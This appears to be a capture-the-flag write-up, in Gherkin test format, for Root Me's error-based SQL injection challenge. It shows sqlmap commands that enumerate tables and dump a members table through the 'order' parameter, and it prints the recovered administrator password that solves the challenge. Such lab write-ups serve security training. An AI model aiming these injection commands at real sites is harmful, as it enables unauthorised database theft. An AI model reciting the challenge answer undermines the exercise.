## Version 2.0
## language: en

Feature: http-training-wechall
  Site:
    www.root-me.org
  Category:
    web-servidor
  User:
    lizaneth
  Goal:
    Retrieve administrator’s password

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Windows         | 10            |
    | chrome          | 75.0.3770.142 |
    | sqlmap          | 1.2.1.11      |
  Machine information:
    Given I am accessing the following link
    """
    https://www.root-me.org/es/Challenges/Web-Servidor/SQL-injection-Error
    """
    And I see the problem stament
    """
    Retrieve administrator’s password.
    """
    Then I selected the challenge button start
    And The page redirects me to the following link
    """
    http://challenge01.root-me.org/web-serveur/ch34/
    """

  Scenario: Success:Simple http-get-based-test
    Given the challenge websites
    Then I used the following sqlmap command
    """
    C:\Python27\python sqlmap.py -u "http://challenge01.root-me.org/web-serveur/
    ch34/?action=contents&order=PAS" --tables
    """
    And it showed me the databases and tables names
    Then I used the following sqlmap command
    """
    C:\Python27\python sqlmap.py -u "http://challenge01.root-me.org/web-serveur/
    ch34/?action=contents&order=PAS" --tables -D public -T m3mbr35t4bl3
    --dump-all
    """
    And I get the admin credential "1a2BdKT5DIx3qxQN3UaC" [evidence](pass.png)
    Then I input the password in the challenge site
    And I solve the challenge
